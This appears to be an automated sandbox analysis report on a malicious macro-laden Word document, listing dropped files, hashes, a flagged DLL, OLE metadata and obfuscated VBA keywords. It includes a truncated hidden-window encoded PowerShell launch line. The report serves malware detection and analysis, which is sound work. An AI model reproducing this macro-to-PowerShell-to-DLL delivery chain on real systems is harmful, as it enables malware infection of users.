Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..<................):gK..G...$.1.q........System.Configuration4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 170164
Entropy (8bit): 4.358394535375791
Encrypted: false
SSDEEP: 1536:fr9jQo7LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fr5g8WpFpKKHHedydFeo+oQLUlPoK0
MD5: 0CC8870D67DEEB05578F8107F79C3BC3
SHA1: 90F1F216A983DA75584021C20243330727655EC6
SHA-256: 997EDB52D239ECE12D62E6D41DD120AA74B013E8624498E352DC71F1B66E73B6
SHA-512: A8EEB1CA5B68D2A634726238AFFE761BF9C072629B3317E45B0CDA6D022E3B85F8157A4414F5857AE02585D4D6AB8953068E7F182B20D44FCDA14D03CF608A0A
Malicious: false
Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbmhr0zq.ixu.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyrecgys.4kk.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 74
Entropy (8bit): 4.060710299033871
Encrypted: false
SSDEEP: 3:M1blG+kLtCLs+kLtCmX1blG+kLtCv:MrG+kLtys+kLtzG+kLts
MD5: D9D81D211C7D3FE392C07C615275BBC8
SHA1: D0AFA7424E42C91595D6AF3178CEB8118A742FC4
SHA-256: 8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
SHA-512: FC4541A6A37F0D5AB6861417F2B68131D9C0C9708F3D413353EF11E71A721AE00E1F78BB0C78CAE1FB16DDCE2F39F86C75D780A9FDA863AF28301064F9B1A65C
Malicious: false
Preview: [doc]..v22Pc0qA.doc.LNK=0..v22Pc0qA.doc.LNK=0..[doc]..v22Pc0qA.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Mon Feb 1 21:25:06 2021, atime=Mon Feb 1 21:25:03 2021, length=207253, window=hide
Category: dropped
Size (bytes): 2130
Entropy (8bit): 4.7012569507367346
Encrypted: false
SSDEEP: 24:8eEzitpCAKQWAkbbDG7aB6myeEzitpCAKQWAkbbDG7aB6m:8TzitpD9krB6pTzitpD9krB6
MD5: 749427E569113450C7BA74A05F76CF1C
SHA1: 1BB4517F99A24C9540CBEE35AB75E8AC818DE60C
SHA-256: 17706A757CF169FFFAADE647211ADD561581721F26DFE0D62E427A82D6AEA4A6
SHA-512: 944A79BE7B7306A7166F1626562528A43168C3CE9A649C61923ED0D9AC0C09B7952FFFEBA5F2C5F24740AF7A086BF0B65103C12AE635C72D514216662F537ED3
Malicious: false
Preview: L..................F.... ....B.S....?5...............)...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..AR......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..AR......#J....................I0H.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..AR.......Y..............>.......X.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..)..AR". .V22PC0~1.DOC..R......>Q{<AR"......V......................U.v.2.2.P.c.0.q.A...d.o.c...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\v22Pc0qA.doc.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.2.2.P.c.0.q.A...d.o.c...d.o.c.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.537027933460949
Encrypted: false
SSDEEP: 3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
MD5: 62D2E9D0E5A00A4933B40C773F2A3521
SHA1: D129090958A7122B098FD1CDE5A80D5FF74E9CF5
SHA-256: 61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
SHA-512: 563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
Malicious: false
Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Little-endian UTF-16 Unicode text, with CR line terminators
Category: dropped
Size (bytes): 22
Entropy (8bit): 2.9808259362290785
Encrypted: false
SSDEEP: 3:QAlX0Gn:QKn
MD5: 7962B839183642D3CDC2F9CEBDBF85CE
SHA1: 2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256: 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512: 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious: false
Preview: ....p.r.a.t.e.s.h.....

C:\Users\user\Desktop\~$2Pc0qA.doc.doc
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.537027933460949
Encrypted: false
SSDEEP: 3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
MD5: 62D2E9D0E5A00A4933B40C773F2A3521
SHA1: D129090958A7122B098FD1CDE5A80D5FF74E9CF5
SHA-256: 61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
SHA-512: 563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
Malicious: false
Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\Documents\20210201\PowerShell_transcript.724536.D_cV0UCD.20210201232511.txt
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11663
                                                                                                                              Entropy (8bit):5.028707508716467
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:yS0NsjXDzcYlm8nuVF9M1GBgovhkssrx0DYQ4+B5mxEk:6kXDTUvhk7x0Dxlm1
                                                                                                                              MD5:870345A71AAB7D049F25966FF1779C26
                                                                                                                              SHA1:8BAE23F02C27D9A661D44B25584E5196752051AD
                                                                                                                              SHA-256:FCA635B949AAA3782CBD70493B1CBBF8CBBB1DB4D6183136DF335A615F081B09
                                                                                                                              SHA-512:A5BEADCAB0A2F4C1663830365F5940102F653202A14316E85A6A9AF9D3351D04045E8D9D354D82C39FD6AB942AF4BFDA04F78789D2B93B7A3A75E7ED9B9BD13E
                                                                                                                              Malicious:false
                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210201232511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD 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
                                                                                                                              C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):228352
                                                                                                                              Entropy (8bit):7.401227982577977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:Q2JsbTQ7oRiTPy6758RAuiGsIwuVKiCJ0/ykN8t+XPjf7z3I43:Q2JCIoRSi1iGsuwfJ0KkU+XPjQ
                                                                                                                              MD5:1BCF5E93610C3774A59240E10932A252
                                                                                                                              SHA1:61D3C80B5E71F136E2D7039AA9D5F41E2595BBF0
                                                                                                                              SHA-256:F5736A1F0C40D3609BA0C394FE424795D71E19A6B57AB55CA9C6F49B79485C27
                                                                                                                              SHA-512:1D57B47A0134D09677AA18356A0A351D335414901BB8B35DA31ACFA43CFBB3F1C76ECEB14F98E915495ECB923BEA23C3F9BC5D711F041F44DCAD6142071B23F2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J..........uz.......`.......................................W..............................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data...d2..........................@....rsrc...............................@..@.reloc...".......$...X..............@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: extensible Automotive generate withdrawal Wooden Global architecture, Author: Chlo Gerard, Template: Normal.dotm, Last Saved By: Thomas Roussel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
Entropy (8bit):6.406111255633529
TrID:
• Microsoft Word document (32009/1) 54.23%
• Microsoft Word document (old ver.) (19008/1) 32.20%
• Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:v22Pc0qA.doc.doc
File size:207253
MD5:7a7d325948481b0557b035249bf5c96a
SHA1:0529727ffad8388fc94155d1652ca65189cda5df
SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
SHA512:45cf99bad712aaace79010c728705117fc12ac76d76f625716115a19477ce40de5d18ecaca8e84ea55c388d4436d4827ab63c660df86dcdc01c5c8ce975dda44
SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5bkxU7PoU2l65gsaTs:Y9ufsfgIf0pLkU7PoU2lIgsaTs
File Content Preview:........................>.......................9...........<...............6...7...8..........................................................................................................................................................................

File Icon

Icon Hash:74f4c4c6c1cac4d8

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "v22Pc0qA.doc.doc"

Indicators

Has Summary Info:True
Application Name:Microsoft Office Word
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1252
Title:
Subject:extensible Automotive generate withdrawal Wooden Global architecture
Author:Chlo Gerard
Keywords:
Comments:
Template:Normal.dotm
Last Saved By:Thomas Roussel
Revision Number:1
Total Edit Time:0
Create Time:2020-12-21 13:51:00
Last Saved Time:2020-12-21 13:51:00
Number of Pages:1
Number of Words:5943
Number of Characters:33877
Creating Application:Microsoft Office Word
Security:8

Document Summary

Document Code Page:1252
Number of Lines:282
Number of Paragraphs:79
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:983040

Streams with VBA

VBA File Name: UserForm1, Stream Size: -1
General
Stream Path:Macros/UserForm1
VBA File Name:UserForm1
Stream Size:-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
False
VB_TemplateDerived
VBA Code

VBA File Name: UserForm2, Stream Size: -1
General
Stream Path:Macros/UserForm2
VBA File Name:UserForm2
Stream Size:-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code

VBA File Name: UserForm3, Stream Size: -1
General
Stream Path:Macros/UserForm3
VBA File Name:UserForm3
Stream Size:-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_Base
VB_Customizable
VB_TemplateDerived
VB_GlobalNameSpace
VBA Code

VBA File Name: UserForm4, Stream Size: -1
General
Stream Path:Macros/UserForm4
VBA File Name:UserForm4
Stream Size:-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Customizable
VB_TemplateDerived
VB_Base
VBA Code

VBA File Name: UserForm5, Stream Size: -1
General
Stream Path:Macros/UserForm5
VBA File Name:UserForm5
Stream Size:-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code

VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
General
Stream Path:Macros/VBA/Dk5att0cu_9jsb
                                                                                                                              VBA File Name:Dk5att0cu_9jsb
                                                                                                                              Stream Size:1114
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived
VBA Code
VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
General
Stream Path: Macros/VBA/Lxvinhyq0hu0i
VBA File Name: Lxvinhyq0hu0i
Stream Size: 16887
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
"cBBImVFtj.VfOyHcZeG.KTQGJQv"
MVKdEA
"iYrsMDeBF.SIoiFJ.zdnAB"
"cfmqZH.yHFfXEyD.iUezXEC"
TFhBESFIX
yqztDCl:
VBA.Replace
jSGTCFaK:
hVRJE
"HGXMmlZoZ.jEXaTVE.zeocvMGG"
RZyrFJ
sbVXlJE:
aDFRF
KAedr
"ObyEHIBL.hGKABcIQ.yeYrFAOmg"
RMyrFd
qLfbCLdC
GLxLQDxBB
KiOKSNEG:
PrigNJEs
nCWvB
RhecDCNb:
YaqiI
yDuIa
aDFRF:
Binary
hckCCJvD:
UbSMfKFUj
CtmaxWDYG
dcClB:
VipWJ:
jSGTCFaK
IpXGAFACy
jWIUH
yqztDCl
"aguCEDpx.XlUcBUj.UPogGhX"
"zSasAJg.LDOIU.vvZOFJ"
"AtMXEHJGF.tPVXDfJI.vNeXEIF"
wVgZExzI
"gtvUAW.KeNGGlEDI.FCFXBEHbH"
hkpqEBd
FEJNFPMF
uYPoFiE
XvETIO
pxMXSJrIc:
dcClB
VIuzQOE:
"zpGvEhCHv.ZNcWIJcU.qeFzJB"
"gEMlED.skZhEggk.ZyWBD"
FzSmxUBI:
IIJMEYBZ
JubeVI
"QWkiJ.sNlBSC.hsUWFP"
BRfTAJ
lOYxmwBA
IIJMEYBZ:
UFEneAQF
FzOAw
"eKLzaJBKG.eCACJBH.NfdiGiC"
Resume
iAKfBEDC:
QqQRUOBIy
"nRpjIJ.tkIcCAbCF.hJzbH"
yHCsJFACD
lfjdHL
mxDIrHC
hckCCJvD
DxojDGC
rDIcxFB:
NwlcQEELI
eYojg
JXblRBK:
kaqktK
olbDbIA:
nCWvB:
"bfJqAKr.cLEdAF.oYWiAFEQ"
lbHAbDF:
ZqNrvaa:
kmOCpG
FoTWuD:
ChrW(wdKeyS)
bVAPDAD
"ZbLbn.FiqyBGPC.ROWoCHF"
cHoJJlDBJ
"CXrJJB.OBfnW.uqEngDYV"
"BpfOu.TVoTOHe.EzrPEDJ"
"rqFdfCgk.WuMsFCHq.wYpcBKVBP"
ObUqEpuD:
NwlcQEELI:
"pJlGBGe.jIXSWL.jkAfAEIf"
"hSzhx.onZqBBzG.aRYCE"
VB_Name
AJXECAN
ZxZNGGUBd:
IaIuovC:
WnWcBBeF
IaIuovC
"TNqlmI.VQzWNlJC.IuleF"
gvnNjywC:
"ErIlZF.tHbIE.idUJKwuOi"
oVlMEI
NJlsEIS
JxVVF
RWlYF
"ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
"KeuGF.APuwUHxl.GiUhBFB"
fGzqP:
uJknJZHFB:
yJzxGZak
PksXIAC:
"obWgmFILu.KLSrfFHDI.nylpN"
"AcrzGL.zwvmHG.MqsxCr"
UbSMfKFUj:
kmOCpG:
"XIjXFFFIJ.jYAPtLTyj.PLtLFT"
Attribute
lfRjBXXFA:
lfRjBXXFA
fGzqP
VIuzQOE
RMyrFd:
JXblRBK
YEAwF
nhVWCG:
"BiUfo.vtUVwAWGC.hUSLqGGIO"
MVKdEA:
"oScEJFIH.GpYhI.ZPvpk"
iZGGBKjGH
"DcfnrACC.XeVEC.QdSVCUJ"
ohdoz
uJtiAP
"WWmJGCEWG.XCrNGJ.ficHzH"
cIiApH
LjVfJ
qLfbCLdC:
zHYrT
sbVXlJE
sCwjljF
JHGODJK
XvETIO:
BrrXfI
JzcNByvAX
"DbRqLDGCg.nxwYCaF.sZZrJ"
nmHtBKNIA
uJknJZHFB
kMzKEr:
pxMXSJrIc
"pPiJFZzI.dfizGxy.NRcSrA"
KiOKSNEG
SEnkGD
"nYskWX.aOSpmAFIB.kCBksCD"
"gjoHAq.pgiDH.iYppCzD"
HMJCGGAMi
"RSIiW.JGdvBjSmB.WubTFJ"
xuAPcBl
xuAPcBl:
jJMCQJDB:
nhVWCG
LjVfJ:
zHYrT:
kMzKEr
lbHAbDF
"YNveE.qehAq.fHHuGb"
"eHqqE.nCeMDET.kZWuQGE"
ZuuLFE
EhrmhuB
"NhKID.SYBhRIEGg.qCLeaM"
"NPkiDT.CkfBJvJ.bgnwZAB"
"fNHCB.hbEBBG.feKiwC"
IGamxCG
ZuuLFE:
jWIUH:
"MiwKq.hkWsDcI.YmoTAGR"
"NgFRIFlFQ.imXZAJE.tzzlC"
RhecDCNb
nmHtBKNIA:
WpdDxhHa
VipWJ
PksXIAC
String
gvnNjywC
eTuZIDG
kySRBFED
ObUqEpuD
uWAjsYwtG
FzSmxUBI
YEAwF:
"dcEwJD.cZCpC.kfXrIC"
FEJNFPMF:
                                                                                                                              "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                                                                                                                              "NipqJ.tIztQI.WMXjaJ"
                                                                                                                              yDuIa:
                                                                                                                              IpXGAFACy:
                                                                                                                              "qKjdvEDq.lYfhW.eTVwADADD"
                                                                                                                              yDAMCG
                                                                                                                              ZqNrvaa
                                                                                                                              TLfxGCa
                                                                                                                              EiViHgGI
                                                                                                                              IJSGH
                                                                                                                              iAKfBEDC
                                                                                                                              TFhBESFIX:
                                                                                                                              GwJXIC
                                                                                                                              Error
                                                                                                                              "dZEvHBM.HWisMo.kLMoA"
                                                                                                                              "OqezBEGR.dKnPpE.XZiNID"
                                                                                                                              dThRBEAv
                                                                                                                              rDIcxFB
                                                                                                                              JKIoD
                                                                                                                              cIiApH:
                                                                                                                              QyqGnByH
                                                                                                                              ahjNCC
                                                                                                                              yDAMCG:
                                                                                                                              Close
                                                                                                                              jJMCQJDB
                                                                                                                              "WWgXBJbAL.psfjJF.iosTZOn"
                                                                                                                              yHCsJFACD:
                                                                                                                              ZxZNGGUBd
                                                                                                                              Function
                                                                                                                              FoTWuD
                                                                                                                              hVRJE:
                                                                                                                              "dCIAJyHr.uGSFGCFE.hgENI"
                                                                                                                              olbDbIA
                                                                                                                              OXtlEDLCd
                                                                                                                              zoqaA
                                                                                                                              "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                                                                                                                              "cklcdFF.ljzQFAII.yhDYGICo"
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm1, Stream Size: 1160
                                                                                                                              General
Stream Path: Macros/VBA/UserForm1
VBA File Name: UserForm1
Stream Size: 1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 6e ff 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm2, Stream Size: 1155
                                                                                                                              General
Stream Path: Macros/VBA/UserForm2
VBA File Name: UserForm2
Stream Size: 1155
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 a8 f8 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm3, Stream Size: 1159
                                                                                                                              General
Stream Path: Macros/VBA/UserForm3
VBA File Name: UserForm3
Stream Size: 1159
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . ^ I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 5e 49 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm4, Stream Size: 1160
                                                                                                                              General
Stream Path: Macros/VBA/UserForm4
VBA File Name: UserForm4
Stream Size: 1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 57 91 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

